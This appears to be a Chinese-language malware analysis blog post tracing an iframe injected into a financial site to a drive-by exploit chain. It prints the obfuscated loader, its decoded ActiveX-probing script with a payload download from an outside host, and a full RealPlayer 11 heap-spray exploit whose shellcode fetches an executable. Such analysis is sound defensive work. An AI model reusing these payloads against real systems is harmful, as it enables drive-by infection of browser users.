财富天下(www.whxld.com/)被插入恶意代码 <iframe src=http://a.158dm.com/b3.htm width=0 height=0></iframe>

http://a.158dm.com/b3.htm的代码里面有这么一句话：<iframe src=http://www.wmfwq.cn/oo.htm width=1 height=1 border=1></iframe> 很关键，看来是嵌套 再来看看http://www.wmfwq.cn/oo.htm的源代码：

<script>window.onerror=function(){return true;}</script><script>window.defaultStatus="完成";eval("\164\162\171\173\166\141\162\40\145\73\15\12\166\141\162\40\141\144\157\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\157\142\152\145\143\164\42\51\51\73\15\12\166\141\162\40\153\141\166\75\42\134\170\63\62\134\170\63\60\134\170\63\60\134\170\63\70\134\170\63\60\134\170\63\63\134\170\63\62\134\170\63\71\42\73\15\12\141\144\157\56\163\145\164\101\164\164\162\151\142\165\164\145\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\141\163\75\141\144\157\56\143\162\145\141\164\145\157\142\152\145\143\164\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\175\15\12\143\141\164\143\150\50\145\51\173\175\73\15\12\146\151\156\141\154\154\171\173\15\12\151\146\50\145\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\66\61\64\56\150\164\155\42\76\74\57\151\146\162\141\155\145\76\47\51\175\15\12\145\154\163\145\173\15\12\164\162\171\173\40\166\141\162\40\146\73\15\12\166\141\162\40\164\150\165\156\144\145\162\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\104\120\103\154\151\145\156\164\56\126\157\144\42\51\73\175\15\12\143\141\164\143\150\50\146\51\173\175\73\15\12\146\151\156\141\154\154\171\173\40\151\146\50\146\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\170\154\56\150\164\155\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\147\73\15\12\166\141\162\40\147\154\167\157\162\154\144\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\107\114\103\110\101\124\56\107\114\103\150\141\164\103\164\162\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\147\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\147\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\154\172\56\150\164\155\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\150\73\15\12\166\141\162\40\163\164\157\162\155\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\115\120\123\56\123\164\157\162\155\120\154\141\171\145\162\56\61\42\51\73\175\15\12\143\141\164\143\150\50\150\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\150\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\142\146\56\150\164\155\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\151\73\15\12\166\141\162\40\162\145\141\154\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\111\105\122\120\103\164\154\56\111\105\122\120\103\164\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\151\51"+"\173"+"\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\151\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\162\145\141\154\61\61\56\150\164\155\42\76\74\57\151\146\162\141\155\145\76\47\51\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\162\145\141\154\61\60\56\150\164\155\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\152\73\15\12\166\141\162\40\102\141\151\144\165\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\134\170\64\62\134\170\66\61\134\170\66\71\134\170\66\64\134\170\67\65\134\170\64\62\134\170\66\61\134\170\67\62\134\170\62\145\134\170\65\64\134\170\66\146\134\170\66\146\134\170\66\143\42\51\73\175\15\12\143\141\164\143\150\50\152\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\152\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\102\141\151\144\165\133\42\134\170\64\64\134\170\66\143\134\170\66\146\134\170\66\61\134\170\66\64\134\170\64\64\134\170\65\63\42\135\50\42\150\164\164\160\72\57\57\167\167\167\56\170\172\146\167\161\56\143\156\57\102\141\151\144\165\56\143\141\142\42\54\40\42\134\170\64\62\134\170\66\61\134\170\66\71\134\170\66\64\134\170\67\65\134\170\62\145\134\170\66\65\134\170\67\70\134\170\66\65\42\54\40\60\51\175\175\15\12\151\146\50\146\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\147\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\150\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\151\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\152\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\15\12\173\154\157\143\141\164\151\157\156\56\162\145\160\154\141\143\145\50\42\141\142\157\165\164\72\142\154\141\156\153\42\51\73\175\175\175")</script>

这个网马很好接，可以把eval修改为alter，不过我直接解的那段8进制字符，解出来如下：

try{var e;
var ado=(document.createElement("object"));
var kav="\x32\x30\x30\x38\x30\x33\x32\x39";
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write('<iframe style=display:none src="614.htm"></iframe>')}
else{
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe style=display:none src="xl.htm"></iframe>')}}
try{var g;
var glworld=new ActiveXObject("GLCHAT.GLChatCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="lz.htm"></iframe>')}}
try{var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src="bf.htm"></iframe>')}}
try{var i;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(i){};
finally{if(i!="[object Error]"){
document.write('<iframe style=display:none src="real11.htm"></iframe>')
document.write('<iframe style=display:none src="real10.htm"></iframe>')}}
try{var j;
var Baidu=new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c");}
catch(j){};
finally{if(j!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://www.xzfwq.cn/Baidu.cab", "\x42\x61\x69\x64\x75\x2e\x65\x78\x65", 0)}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}}}

百度了一下“BD96C556-65A3-11D0-983A-00C04FC29E36”：原来是MS06-014漏洞：Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码。和千千静听的曾经被挂马一样的溢出dll。继续看这段代码。
很恐怖，里面包含了很多马！614.htm，xl.htm，lz.htm，bf.htm，real11.htm，real10.htm，啥马都用上了，包括real[10+11]的，郁闷啊，中国的现状~。我解析614.htm发现，木马的地址是http://www.xzfwq.cn/ok.exe，614.htm只是加花，解密很简单。

xl.htm，lz.htm，bf.htm这三个页面不知道为什么不存在了，不管他，我来看real11.htm，发现源码如下：

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" ><title>Real11</title></head><body>艰繇炀崐艰遽渚崐柬弭釥梏麴 聃轹舰蔑铘孱舡赠疱 泔铘孱艚Ⅳ屮舣梏盱粻汨狎箦艚沼 用缮 緧娂糸綮寰义犰北集糸綮寰崐集桢徜炯怙澌緧娂梏盱緧娂镡赍泗犮灬篌殇舰沆箝浜财荡擦才 拿弓绰品 寐杯阜霉贡蛊菲钩 殇舰镡辎緧妷壝殡暹义犰徐狴弪北吲 崐集镡赍泗緧姞牸筱蜷痿犾犷珲徵褰⑹狯嵊泸轲簪緧婃躅泗轱顮瞄脲ī狖崐鲠驙瞄脲耨捣档恫钒笭綘躅弩汜疱áヵ荡怕ヵ返嘎ヵ嘎趁 珝姞牋牋牋牋牋ⅴ醭捣触醢撤弗醯镀单醴陡楼醢巢哎醭称单醮姑耿牜崐牋牋牋牋牋牏ヵ聊幢ヵ穆吵ヵ捌扯ヵ贝屡ヵ掣哺ヵ反撇ヵ帽案 珝姞牋牋牋牋牋ⅴ醢拿楼跄涟偿跖麓哎醭屡匹醴的匹醯排伐醯鸥垄牜崐牋牋牋牋牋牏ヵ俺泊ヵ抖哪ヵ懊嘎ヵ嘎绰ヵ泵蹬ヵ哪俺ヵ按嘎 珝姞牋牋牋牋牋ⅴ醢掣楼趺趁单醴卜单醵亩氓醵哦匹醵床钮醵枚芒牜崐牋牋牋牋牋牏ヵ闯鞍ヵ得沉ヵ插档ヵ犯兜ヵ鞍兜ヵ冒吵ヵ俺洞 珝姞牋牋牋牋牋ⅴ醭按哎醢梅弗醮案楼醺掳氓醣梅哎醺铝磨醢复阿牜崐牋牋牋牋牋牏ヵ肮怕ヵ窗嘎ヵ改炒ヵ访窗ヵ窗嘎ヵ沟趁ヵ概缕 珝姞牋牋牋牋牋ⅴ醢糯钮跖概氓跗聘触跗破匹跖酶偿醺嘲触醪床芒牜崐牋牋牋牋牋牏ヵ破趁ヵ沟陌ヵ缕蛋ヵ绷扯ヵ钒财ヵ镀鸥ヵ破破 珝姞牋牋牋牋牋ⅴ醺缕匹醪吹触醺钠氓趼恋播跄鲁偿醯车偿跖碌并牜崐牋牋牋牋牋牏ヵ党泊ヵ陌破ヵ缕的ヵ婆垢ヵ芭噶ヵ党鸥ヵ破破 珝姞牋牋牋牋牋ⅴ醺称匹醢磁氓醪酶偿醵膊触跄捌匹醴怕匹跖材涪牜崐牋牋牋牋牋牏ヵ鸥烦ヵ破窗ヵ破破ヵ破挡ヵ鸥陌ヵ破姆ヵ破破 珝姠ヵ反陡ヵ钒反ヵ叉翅ヵ贩叉ヵ贩贩ヵ犯插ヵ抖丰ヵ繁贩ヵ冻插ヵ叉跺ヵ垛舵ヵ兜插ヵ兜犯ⅸ粛姞牋牋牋狏狎犆殡鬻頎綘躅弩汜疱áヵ懊懊ヵ懊懊ⅸ粛妷鲠驙骢汶 蹼狍疱蝮膣牻牪盎崐夦狎犳蹼泫秕蜷箝铉牻犳蹉膣秕脶箴弪箅鶢珷瞄脲耨捣档恫钒府戾铉翳粛妷麒殪鍫 殡鬻懋戾铉翳牸犳蹼泫秕蜷箝铉 瞄脲黜牜綘瞄脲黜粛妷鲠驙骈祆忪镢霠綘瞄脲黜 踱篝蜷铉ò 蹼泫秕蜷箝铉┗崐夦狎犫祜汶牻犆殡鬻懋篚怏趄轭绋艾瞄脲黜 孱玺锠瓲骢脬 躜轶轭绌粛妷麒殪鍫ㄢ祜汶 孱玺锠珷骢脬 躜轶轭鐮紶傍窗鞍癌犫祜汶牻犫祜汶牜牏 祜汶牜犳殪焘祜汶粛妷鲠驙 礤顮綘铄鳡硫蜥 ┗崐夋矧牗闋綘盎犻牸牫鞍粻楂 麪 礤钲檩牻犫祜汶牜犆殡羼竦返刀卜案狚崐夦狎犫蹑牻牕Щ崐夨栝戾牗怩娈戾铉翳牸牫博犫蹑牻犫蹑牜狌铄筱狃濞ⅴ懊ⅸ粛妷鲠驙顼镤哝祜鳡綘镡戤蔑铙镬寤崐夛怅 镱箫戾牻犫蹑粛妷镡戤蔑铙镬鍫綘顼镤哝祜骰崐夌镲溥骒秣牻狅怅 镱箫戾粛妷镡戤蔑铙镬鍫綘怩婊崐夛怅 镱箫戾牻犵镲溥骒秣粛姞隣崐麔娒殡濞┗崐龒娂 泸轲艟崐集梏盱緧娂 镤 集梏盱線</body></html>

非常恶心，不过一看就知道怎么解了，用US-ASCII[只能用工具解]，解出来是如下：

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" >
<title>Real11</title>
</head><body>
<html>
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">
   Cike_RealPlayer11_Exp
</object>
<script language="JavaScript">
function Cike() {
var Cikeqq575562708 = unescape("%u54EB%u758B%u8B3C" +
           "%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9" +
           "%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108" +
           "%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B" +
           "%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B" +
           "%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C" +
           "%u4300%u5C3A%u2e55%u7865%u0065%uC033%u0364" +
           "%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840" +
           "%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF" +
           "%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C" +
           "%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF" +
           "%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52" +
           "%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF" +
           "%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8" +
           "%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF" +
"%u7468%u7074%u2f3a%u772f%u7777%u782e%u667a%u7177%u632e%u2f6e%u6b6f%u652e%u6578");
        var Cikewm = unescape("%u0C0C%u0C0C");
var fuckyoukaspersky = 20;
var fukcyourising = fuckyoukaspersky + Cikeqq575562708.length;
while (Cikewm.length < fukcyourising) Cikewm += Cikewm;
var fillblock = Cikewm.substring(0,fukcyourising);
var block = Cikewm.substring(0,Cikewm.length - fukcyourising);
while (block.length + fukcyourising < 0x40000) block = block + "" +block + fillblock;
var yumen = new Array();
for (i = 0; i < 300; i++){ yumen[i] = block + Cikeqq575562708 }
var buf = '';
while (buf.length < 32) buf = buf + unescape("%0C");
var good_flow = obj.Console;
obj.Console = buf;
obj.Console = good_flow;
good_flow = obj.Console;
obj.Console = buf;
obj.Console = good_flow;
}
{
Cike();
}
</script>
</html>
</body></html>

发现了shellcode，o(∩_∩)o... 用的是unescape函数 shellcode的解法不难，难很烦 就是去掉%u 然后两位两位地换过来 shellcode的最后一行，看见了没有？是%u7468%u7074%u2f3a%u772f%u7777%u782e%u667a%u7177%u632e%u2f6e%u6b6f%u652e%u6578，按我说的办法处理一下，变成了 687474703a2f2f7777772e787a6677712e636e2f6f6b2e657865 这是需要切割的一段16进制字符，再处理下 特殊粘贴进C32ASM 发现了木马地址：